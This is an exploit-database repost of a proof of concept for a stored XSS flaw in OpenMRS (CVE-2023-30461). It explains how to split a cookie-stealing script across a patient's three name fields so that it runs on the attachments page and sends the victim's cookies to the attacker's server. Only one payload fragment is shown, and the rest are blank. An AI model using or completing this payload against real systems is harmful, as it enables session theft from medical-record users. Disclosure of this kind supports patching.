OpenMRS V2.4.2, 2.12.2 Stored XSS Vulnerabiltiy

CVE Category Price Severity
CVE-2023-30461 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Not disclosed High Remote 2023-04-10

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

OpenMRS V2.4.2, 2.12.2 Stored XSS Vulnerabiltiy
# Exploit Title: OpenMRS XSS Vulnerability in Attachments
# Date: 2023-04-09
# Exploit Author: Omar Tsai
# Vendor Homepage:
# Software Link:
# Version: 2.4.2, 2.12.2
# Tested on: OpenMRS 2.4.2, 2.12.2 Standalone
# CVE : CVE-2023-30461

# Proof-of-concept for XSS OpenMRS 2.4.2, 2.12,2

In this example, I will demonstrate a simple cookie-stealing attack using the three fields in a patient (First name, Middle name, and Last name).

## 1. Figure out the XSS payload


Now we have to split this into 50-character limited chunks since each name field is limited to 50 characters only. Note that the backtick is needed for quotes since quotations are escaped in the field.

## 2. Split up the XSS payload into 3 parts

I will split the payload into 3 parts using a variable and the final jquery request:

**For the first name:**

<script>var a=`https://my-own`</script>

**For the middle name:**


**For the last name:**


## 3. Save the patient information

Just click save

## 4. Execute XSS attack

The XSS attack can be triggered by going to the `attachments` page of the patient.

## 5. Get cookies

If you look back at your server logs, a GET request will have been initiated with the user's cookies

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.